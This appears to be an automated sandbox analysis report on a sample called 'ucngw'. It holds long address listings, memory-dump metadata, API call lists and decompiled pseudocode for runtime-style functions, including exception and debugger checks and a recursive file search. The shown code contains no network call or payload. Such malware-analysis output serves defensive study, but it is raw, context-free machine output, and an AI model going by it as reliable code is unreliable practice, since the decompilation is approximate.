    0x1000bf0f
    0x1000bf11
    0x1000bf17
    0x1000bf17
    0x1000bf19
    0x1000bf19
    0x1000bf1b
    0x1000bf24
    0x1000bf2b
    0x1000bf2e
    0x1000bf2f
    0x1000bf31
    0x1000bf31
    0x1000bfea
    0x1000bfea
    0x1000bfec
    0x00000000
    0x1000bff2
    0x1000bff2
    0x1000bff8
    0x1000bffb
    0x1000bf3e
    0x1000bf45
    0x00000000
    0x1000c001
    0x1000c003
    0x1000c009
    0x1000c00f
    0x1000c010
    0x1000c207
    0x1000c207
    0x1000c20e
    0x1000c20f
    0x1000c210
    0x1000c215
    0x1000c218
    0x1000c218
    0x1000bffb
    0x1000bfec
    0x1000bf03
    0x1000bee0
    0x1000bee0
    0x1000bee2
    0x1000bee8
    0x1000c192
    0x1000c192
    0x1000c193
    0x1000c199
    0x1000c199
    0x1000c1a0
    0x1000c1a1
    0x1000c1a2
    0x1000c1a7
    0x1000c1aa
    0x1000c1aa
    0x1000c1aa
    0x1000bede
    0x1000c1ac
    0x1000c1ac
    0x1000c1ae
    0x1000c21c
    0x1000c223
    0x1000c223
    0x1000c223
    0x1000c22a
    0x1000c22c
    0x1000c232
    0x1000c233
    0x1000c6df
    0x1000c6df
    0x1000c6e0
    0x1000c6e1
    0x1000c6e6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x1000c1b0
    0x1000c1b6
    0x1000c1b6
    0x1000c1bc
    0x1000c1bc
    0x1000c1c8
    0x00000000
    0x1000c1c8
    0x1000be57
    0x1000c6e9
    0x1000c6e9
    0x1000c6ef
    0x1000c6f1
    0x1000c6f7
    0x1000c6fd
    0x1000c6ff
    0x1000c701
    0x1000c703
    0x1000c703
    0x1000c705
    0x1000c705
    0x1000c70e
    0x1000c70f
    0x1000c713
    0x1000c71a
    0x1000c71d
    0x1000c71e
    0x1000c720
    0x1000c720
    0x1000c724
    0x1000c72a
    0x1000c72c
    0x1000c732
    0x1000c734
    0x1000c73a
    0x1000c73d
    0x1000c750
    0x1000c752
    0x1000c753
    0x1000c759
    0x1000c765
    0x1000c76c
    0x1000c76d
    0x1000c76e
    0x1000c773
    0x1000c73f
    0x1000c741
    0x1000c748
    0x1000c748
    0x1000c73d
    0x1000c776
    0x1000c776
    0x1000c786
    0x1000c78f
    0x1000c790
    0x1000c792
    0x1000c829
    0x1000c82b
    0x1000c836
    0x1000c836
    0x1000c838
    0x1000c83b
    0x1000c83d
    0x00000000
    0x1000c82d
    0x1000c833
    0x1000c833
    0x1000c798
    0x1000c798
    0x1000c79e
    0x1000c7a1
    0x1000c7a7
    0x1000c7aa
    0x1000c7b0
    0x1000c7b2
    0x1000c7b8
    0x1000c7ba
    0x1000c7bc
    0x1000c7bc
    0x1000c7be
    0x1000c7be
    0x1000c7cb
    0x1000c7d2
    0x1000c7d5
    0x1000c7d6
    0x1000c7d8
    0x1000c7d9
    0x1000c7d9
    0x1000c7dd
    0x1000c7e3
    0x1000c7e5
    0x1000c7e7
    0x1000c7ed
    0x1000c7f0
    0x1000c803
    0x1000c804
    0x1000c80a
    0x1000c816
    0x1000c81d
    0x1000c81e
    0x1000c81f
    0x1000c824
    0x1000c7f2
    0x1000c7f2
    0x1000c7f9
    0x1000c7f9
    0x1000c7f0
    0x1000c7e5
    0x1000c843
    0x1000c843
    0x1000c843
    0x1000c84f
    0x1000c852
    0x1000c858
    0x1000c85a
    0x1000c85c
    0x1000c862
    0x1000c864
    0x1000c864
    0x1000c864
    0x1000c862
    0x1000c869
    0x1000c86a
    0x1000c86c
    0x1000c86e
    0x1000c86e
    0x1000c870
    0x1000c876
    0x1000c87c
    0x1000c87e
    0x1000c884
    0x1000c884
    0x1000c88a
    0x1000c88c
    0x00000000
    0x00000000
    0x1000c892
    0x1000c894
    0x1000c896
    0x1000c896
    0x1000c898
    0x1000c898
    0x1000c8a8
    0x1000c8af
    0x1000c8b2
    0x1000c8b3
    0x1000c8b5
    0x1000c8b5
    0x1000c8b9
    0x1000c8bf
    0x1000c8c1
    0x1000c8c3
    0x1000c8c9
    0x1000c8cc
    0x1000c8dd
    0x1000c8df
    0x1000c8e0
    0x1000c8e6
    0x1000c8f2
    0x1000c8f9
    0x1000c8fa
    0x1000c8fb
    0x1000c900
    0x1000c8ce
    0x1000c8ce
    0x1000c8d5
    0x1000c8d5
    0x1000c8cc
    0x1000c911
    0x1000c920
    0x1000c921
    0x1000c921
    0x1000c923
    0x1000c925
    0x1000c925
    0x1000c92b
    0x1000c92e
    0x1000c930
    0x1000c932
    0x1000c932
    0x1000c935
    0x1000c936
    0x1000c936
    0x1000c93b
    0x1000c93e
    0x1000c942
    0x1000c942
    0x1000c943
    0x1000c945
    0x1000c94b
    0x1000c951
    0x00000000
    0x00000000
    0x00000000
    0x1000c951
    0x1000c884
    0x1000c957
    0x1000c957
    0x00000000
    0x1000c957
    0x1000b6dc
    0x1000b6d3
    0x1000b6ca
    0x1000b681
    0x1000b685
    0x1000b68d
    0x00000000
    0x1000b68f
    0x1000b695
    0x1000b69a
    0x1000c976
    0x1000c976
    0x1000c979
    0x1000c984
    0x1000c9af
    0x1000c9b0
    0x1000c9b1
    0x1000c9b2
    0x1000c9b3
    0x1000c9b4
    0x1000c9b9
    0x1000c9bc
    0x1000c9bf
    0x1000c9c0
    0x1000c9c3
    0x1000c9c5
    0x1000c9cb
    0x1000c9ce
    0x1000c9d0
    0x1000c9e5
    0x1000c9e6
    0x1000c9e9
    0x1000c9eb
    0x1000ca01
    0x1000ca07
    0x1000ca0f
    0x1000ca11
    0x1000ca1c
    0x1000ca1f
    0x1000ca36
    0x1000ca21
    0x1000ca21
    0x1000ca26
    0x00000000
    0x1000ca26
    0x1000ca13
    0x1000ca13
    0x1000ca18
    0x1000ca28
    0x1000ca28
    0x1000ca29
    0x1000ca2b
    0x1000ca30
    0x1000ca30
    0x1000c9ed
    0x1000c9ed
    0x1000c9f0
    0x00000000
    0x1000c9f2
    0x1000c9f5
    0x1000c9fd
    0x1000c9fd
    0x1000c9f0
    0x1000c9d2
    0x1000c9d2
    0x1000c9d9
    0x1000c9da
    0x1000c9dc
    0x1000c9e1
    0x1000c9e1
    0x1000c9c7
    0x1000c9c7
    0x1000c9c7
    0x1000ca3a
    0x1000c986
    0x1000c986
    0x1000c986
    0x1000c990
    0x1000c999
    0x1000c99e
    0x1000c9ac
    0x1000c9ac
    0x1000c984
    0x1000b68d

    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C51A54, Relevance: 6.1, APIs: 4, Instructions: 75
    C-Code - Quality: 85%
    			E00C51A54(intOrPtr __edx, intOrPtr __edi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				_Unknown_base(*)()* _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t38;
				long _t48;
				signed int _t50;
				intOrPtr _t51;
				signed char _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;

				_t57 = __edi;
				_t56 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				 *0xc6ad00 = 0;
				_v632 = E00C53610(_t57,  &_v808, 0, 0x2cc);
				_v636 = _t55;
				_v640 = _t56;
				_v644 = _t51;
				_v648 = 0;
				_v652 = _t57;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t38 =  &_v0;
				_v612 = _t38;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t38 - 4));
				E00C53610(_t57,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t48 = UnhandledExceptionFilter( &_v12);
				if(_t48 == 0) {
					_t50 =  ~(_t54 & 0x000000ff);
					asm("sbb eax, eax");
					 *0xc6ad00 =  *0xc6ad00 & _t50;
					return _t50;
				}
				return _t48;
			}

































    0x00c51a54
    0x00c51a54
    0x00c51a68
    0x00c51a6a
    0x00c51a6d
    0x00c51a6d
    0x00c51a7e
    0x00c51a8c
    0x00c51a92
    0x00c51a98
    0x00c51a9e
    0x00c51aa4
    0x00c51aaa
    0x00c51ab0
    0x00c51ab7
    0x00c51abe
    0x00c51ac5
    0x00c51acc
    0x00c51ad3
    0x00c51ada
    0x00c51adb
    0x00c51ae4
    0x00c51aea
    0x00c51aed
    0x00c51af3
    0x00c51b02
    0x00c51b0d
    0x00c51b18
    0x00c51b1f
    0x00c51b26
    0x00c51b30
    0x00c51b38
    0x00c51b41
    0x00c51b43
    0x00c51b46
    0x00c51b48
    0x00c51b52
    0x00c51b5a
    0x00c51b5f
    0x00c51b61
    0x00c51b63
    0x00000000
    0x00c51b63
    0x00c51b6e

    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C51A61
    • IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 00C51B29
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C51B48
    • UnhandledExceptionFilter.KERNEL32(?), ref: 00C51B52
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C5850A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127
    C-Code - Quality: 71%
    			E00C5850A(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v28;
				signed int _v32;
				WCHAR* _v36;
				signed int _v48;
				intOrPtr _v556;
				intOrPtr _v558;
				struct _WIN32_FIND_DATAW _v604;
				intOrPtr* _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr _v644;
				intOrPtr _v648;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				signed int _t45;
				signed int _t48;
				signed int _t50;
				signed int _t51;
				signed char _t53;
				signed int _t62;
				void* _t64;
				union _FINDEX_INFO_LEVELS _t66;
				signed int _t71;
				intOrPtr* _t72;
				signed int _t75;
				void* _t82;
				void* _t84;
				signed int _t85;
				void* _t89;
				WCHAR* _t90;
				void* _t91;
				intOrPtr* _t94;
				intOrPtr _t97;
				void* _t99;
				signed int _t100;
				intOrPtr* _t104;
				signed int _t107;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				void* _t114;
				void* _t115;
				signed int _t117;
				void* _t118;
				union _FINDEX_INFO_LEVELS _t119;
				void* _t120;
				void* _t123;
				void* _t124;
				void* _t125;
				signed int _t126;
				void* _t127;
				void* _t128;
				signed int _t132;
				void* _t133;
				signed int _t134;
				void* _t135;
				void* _t136;

				_push(__ecx);
				_t94 = _a4;
				_t2 = _t94 + 2; // 0x2
				_t110 = _t2;
				do {
					_t40 =  *_t94;
					_t94 = _t94 + 2;
				} while (_t40 != 0);
				_t117 = _a12;
				_t97 = (_t94 - _t110 >> 1) + 1;
				_v8 = _t97;
				if(_t97 <= (_t40 | 0xffffffff) - _t117) {
					_t5 = _t117 + 1; // 0x1
					_t89 = _t5 + _t97;
					_t124 = E00C5623C(_t97, _t89, 2);
					_t99 = _t123;
					__eflags = _t117;
					if(_t117 == 0) {
						L6:
						_push(_v8);
						_t89 = _t89 - _t117;
						_t45 = E00C5831A(_t99, _t124 + _t117 * 2, _t89, _a4);
						_t134 = _t133 + 0x10;
						__eflags = _t45;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t82 = E00C58783(_a16, __eflags, _t124);
							E00C56171(0);
							_t84 = _t82;
							goto L8;
						}
					} else {
						_push(_t117);
						_t85 = E00C5831A(_t99, _t124, _t89, _a8);
						_t134 = _t133 + 0x10;
						__eflags = _t85;
						if(_t85 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00C54EB4();
							asm("int3");
							_t132 = _t134;
							_t135 = _t134 - 0x260;
							_t48 =  *0xc6a004; // 0x26d30358
							_v48 = _t48 ^ _t132;
							_t111 = _v28;
							_t100 = _v32;
							_push(_t89);
							_t90 = _v36;
							_push(_t124);
							_push(_t117);
							_t125 = 0x5c;
							_v644 = _t111;
							_v648 = 0x2f;
							_t118 = 0x3a;
							while(1) {
								__eflags = _t100 - _t90;
								if(_t100 == _t90) {
									break;
								}
								_t50 =  *_t100 & 0x0000ffff;
								__eflags = _t50 - _v612;
								if(_t50 != _v612) {
									__eflags = _t50 - _t125;
									if(_t50 != _t125) {
										__eflags = _t50 - _t118;
										if(_t50 != _t118) {
											_t100 = _t100 - 2;
											__eflags = _t100;
											continue;
										}
									}
								}
								break;
							}
							_t126 =  *_t100 & 0x0000ffff;
							__eflags = _t126 - _t118;
							if(_t126 != _t118) {
								L19:
								_t51 = _t126;
								_t119 = 0;
								_t112 = 0x2f;
								__eflags = _t51 - _t112;
								if(_t51 == _t112) {
									L23:
									_t53 = 1;
									__eflags = 1;
								} else {
									_t114 = 0x5c;
									__eflags = _t51 - _t114;
									if(_t51 == _t114) {
										goto L23;
									} else {
										_t115 = 0x3a;
										__eflags = _t51 - _t115;
										if(_t51 == _t115) {
											goto L23;
										} else {
											_t53 = 0;
										}
									}
								}
								_t103 = (_t100 - _t90 >> 1) + 1;
								asm("sbb eax, eax");
								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
								E00C53610(_t119,  &_v604, _t119, 0x250);
								_t136 = _t135 + 0xc;
								_t127 = FindFirstFileExW(_t90, _t119,  &_v604, _t119, _t119, _t119);
								__eflags = _t127 - 0xffffffff;
								if(_t127 != 0xffffffff) {
									_t104 = _v608;
									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
									__eflags = _t62;
									_v616 = _t62 >> 2;
									_t64 = 0x2e;
									do {
										__eflags = _v604.cFileName - _t64;
										if(_v604.cFileName != _t64) {
											L36:
											_push(_t104);
											_t66 = E00C5850A(_t104,  &(_v604.cFileName), _t90, _v612);
											_t136 = _t136 + 0x10;
											__eflags = _t66;
											if(_t66 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											__eflags = _v558 - _t119;
											if(_v558 == _t119) {
												goto L37;
											} else {
												__eflags = _v558 - _t64;
												if(_v558 != _t64) {
													goto L36;
												} else {
													__eflags = _v556 - _t119;
													if(_v556 == _t119) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t71 = FindNextFileW(_t127,  &_v604);
										_t104 = _v608;
										__eflags = _t71;
										_t64 = 0x2e;
									} while (_t71 != 0);
									_t72 = _t104;
									_t107 = _v616;
									_t113 =  *_t72;
									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
									__eflags = _t107 - _t75;
									if(_t107 != _t75) {
										E00C5B610(_t90, _t113 + _t107 * 4, _t75 - _t107, 4, E00C58325);
									}
								} else {
									_push(_v608);
									_t66 = E00C5850A(_t103, _t90, _t119, _t119);
									L26:
									_t119 = _t66;
								}
								__eflags = _t127 - 0xffffffff;
								if(_t127 != 0xffffffff) {
									FindClose(_t127);
								}
							} else {
								__eflags = _t100 -  &(_t90[1]);
								if(_t100 ==  &(_t90[1])) {
									goto L19;
								} else {
									_push(_t111);
									E00C5850A(_t100, _t90, 0, 0);
								}
							}
							_pop(_t120);
							_pop(_t128);
							__eflags = _v12 ^ _t132;
							_pop(_t91);
							return E00C51252(_t91, _v12 ^ _t132, _t120, _t128);
						} else {
							goto L6;
						}
					}
				} else {
					_t84 = 0xc;
					L8:
					return _t84;
				}
				L40:
			}
































































    0x00c5850f
    0x00c58510
    0x00c58517
    0x00c58517
    0x00c5851a
    0x00c5851a
    0x00c5851d
    0x00c58520
    0x00c58525
    0x00c5852f
    0x00c58532
    0x00c58537
    0x00c5853f
    0x00c58542
    0x00c5854c
    0x00c5854f
    0x00c58550
    0x00c58552
    0x00c58566
    0x00c58566
    0x00c58569
    0x00c58573
    0x00c58578
    0x00c5857b
    0x00c5857d
    0x00000000
    0x00c5857f
    0x00c58583
    0x00c5858c
    0x00c58592
    0x00000000
    0x00c58594
    0x00c58554
    0x00c58554
    0x00c5855a
    0x00c5855f
    0x00c58562
    0x00c58564
    0x00c5859b
    0x00c5859d
    0x00c5859e
    0x00c5859f
    0x00c585a0
    0x00c585a1
    0x00c585a2
    0x00c585a7
    0x00c585ab
    0x00c585ad
    0x00c585b3
    0x00c585ba
    0x00c585bd
    0x00c585c0
    0x00c585c3
    0x00c585c4
    0x00c585c7
    0x00c585c8
    0x00c585cb
    0x00c585ce
    0x00c585d4
    0x00c585de
    0x00c585fa
    0x00c585fa
    0x00c585fc
    0x00000000
    0x00000000
    0x00c585e1
    0x00c585e4
    0x00c585eb
    0x00c585ed
    0x00c585f0
    0x00c585f2
    0x00c585f5
    0x00c585f7
    0x00c585f7
    0x00000000
    0x00c585f7
    0x00c585f5
    0x00c585f0
    0x00000000
    0x00c585eb
    0x00c585fe
    0x00c58601
    0x00c58604
    0x00c58620
    0x00c58622
    0x00c58624
    0x00c58626
    0x00c58627
    0x00c5862a
    0x00c58640
    0x00c58642
    0x00c58642
    0x00c5862c
    0x00c5862e
    0x00c5862f
    0x00c58632
    0x00000000
    0x00c58634
    0x00c58636
    0x00c58637
    0x00c5863a
    0x00000000
    0x00c5863c
    0x00c5863c
    0x00c5863c
    0x00c5863a
    0x00c58632
    0x00c5864a
    0x00c58652
    0x00c58656
    0x00c58664
    0x00c58669
    0x00c5867e
    0x00c58680
    0x00c58683
    0x00c586b8
    0x00c586c3
    0x00c586c3
    0x00c586c8
    0x00c586ce
    0x00c586cf
    0x00c586cf
    0x00c586d6
    0x00c586f3
    0x00c586f3
    0x00c58702
    0x00c58707
    0x00c5870a
    0x00c5870c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00c586d8
    0x00c586d8
    0x00c586df
    0x00000000
    0x00c586e1
    0x00c586e1
    0x00c586e8
    0x00000000
    0x00c586ea
    0x00c586ea
    0x00c586f1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00c586f1
    0x00c586e8
    0x00c586df
    0x00000000
    0x00c5870e
    0x00c58716
    0x00c5871c
    0x00c58722
    0x00c58726
    0x00c58726
    0x00c58729
    0x00c5872b
    0x00c58731
    0x00c58738
    0x00c5873b
    0x00c5873d
    0x00c58751
    0x00c58756
    0x00c58685
    0x00c5868b
    0x00c5868f
    0x00c58697
    0x00c58697
    0x00c58697
    0x00c58699
    0x00c5869c
    0x00c5869f
    0x00c5869f
    0x00c58606
    0x00c58609
    0x00c5860b
    0x00000000
    0x00c5860d
    0x00c5860d
    0x00c58613
    0x00c58618
    0x00c5860b
    0x00c586aa
    0x00c586ab
    0x00c586ac
    0x00c586ae
    0x00c586b7
    0x00000000
    0x00000000
    0x00000000
    0x00c58564
    0x00c58539
    0x00c5853b
    0x00c58595
    0x00c5859a
    0x00c5859a
    0x00000000

    APIs
      • Part of subcall function 00C5623C: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C58055,00000001,00000364,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA), ref: 00C5627D
      • Part of subcall function 00C54EB4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C54EB6
      • Part of subcall function 00C54EB4: GetCurrentProcess.KERNEL32(C0000417,?,00C51FCA), ref: 00C54ED8
      • Part of subcall function 00C54EB4: TerminateProcess.KERNEL32(00000000,?,00C51FCA), ref: 00C54EDF
    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00C58678
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 10008EEC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
    C-Code - Quality: 72%
    			E10008EEC(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E10005E8C(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E1000DC6B(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E1000912B(_a16, _t101, __eflags, _t111);
							E10005D67(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E1000DC6B(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E10006807();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x1001d018; // 0x26c1db24
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E1000DCC0(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E10001E90(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E10008EEC(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E1000D820(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E10008D44);
									}
								} else {
									_push(_t55);
									_t57 = E10008EEC(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E10008EEC(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E10001B26(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}















































    0x10008ef1
    0x10008ef2
    0x10008ef5
    0x10008ef5
    0x10008ef8
    0x10008ef8
    0x10008efa
    0x10008efb
    0x10008f04
    0x10008f05
    0x10008f08
    0x10008f0b
    0x10008f10
    0x10008f17
    0x10008f18
    0x10008f19
    0x10008f1c
    0x10008f26
    0x10008f29
    0x10008f2a
    0x10008f2c
    0x10008f40
    0x10008f40
    0x10008f43
    0x10008f4d
    0x10008f52
    0x10008f55
    0x10008f57
    0x00000000
    0x10008f59
    0x10008f5d
    0x10008f66
    0x10008f6c
    0x00000000
    0x10008f6f
    0x10008f2e
    0x10008f2e
    0x10008f34
    0x10008f39
    0x10008f3c
    0x10008f3e
    0x10008f75
    0x10008f77
    0x10008f78
    0x10008f79
    0x10008f7a
    0x10008f7b
    0x10008f7c
    0x10008f81
    0x10008f85
    0x10008f87
    0x10008f8d
    0x10008f94
    0x10008f97
    0x10008f9a
    0x10008f9b
    0x10008f9e
    0x10008f9f
    0x10008fa2
    0x10008fa3
    0x10008fc4
    0x10008fc4
    0x10008fc6
    0x00000000
    0x00000000
    0x10008fab
    0x10008fad
    0x10008faf
    0x10008fb1
    0x10008fb3
    0x10008fb5
    0x10008fb7
    0x10008fc2
    0x00000000
    0x10008fc2
    0x10008fb7
    0x10008fb3
    0x00000000
    0x10008faf
    0x10008fc8
    0x10008fca
    0x10008fcd
    0x10008fe6
    0x10008fe6
    0x10008fe8
    0x10008feb
    0x10008ffb
    0x10008ffd
    0x10008ffd
    0x10008fed
    0x10008fed
    0x10008ff0
    0x00000000
    0x10008ff2
    0x10008ff2
    0x10008ff5
    0x00000000
    0x10008ff7
    0x10008ff7
    0x10008ff7
    0x10008ff5
    0x10008ff0
    0x10009003
    0x1000900b
    0x1000900f
    0x1000901d
    0x10009022
    0x10009037
    0x10009039
    0x1000903f
    0x10009042
    0x10009074
    0x10009074
    0x10009076
    0x10009079
    0x1000907f
    0x1000907f
    0x10009086
    0x100090a0
    0x100090a0
    0x100090af
    0x100090b4
    0x100090b7
    0x100090b9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x10009088
    0x10009088
    0x1000908e
    0x10009090
    0x00000000
    0x10009092
    0x10009092
    0x10009095
    0x00000000
    0x10009097
    0x10009097
    0x1000909e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x1000909e
    0x10009095
    0x10009090
    0x00000000
    0x100090bb
    0x100090c3
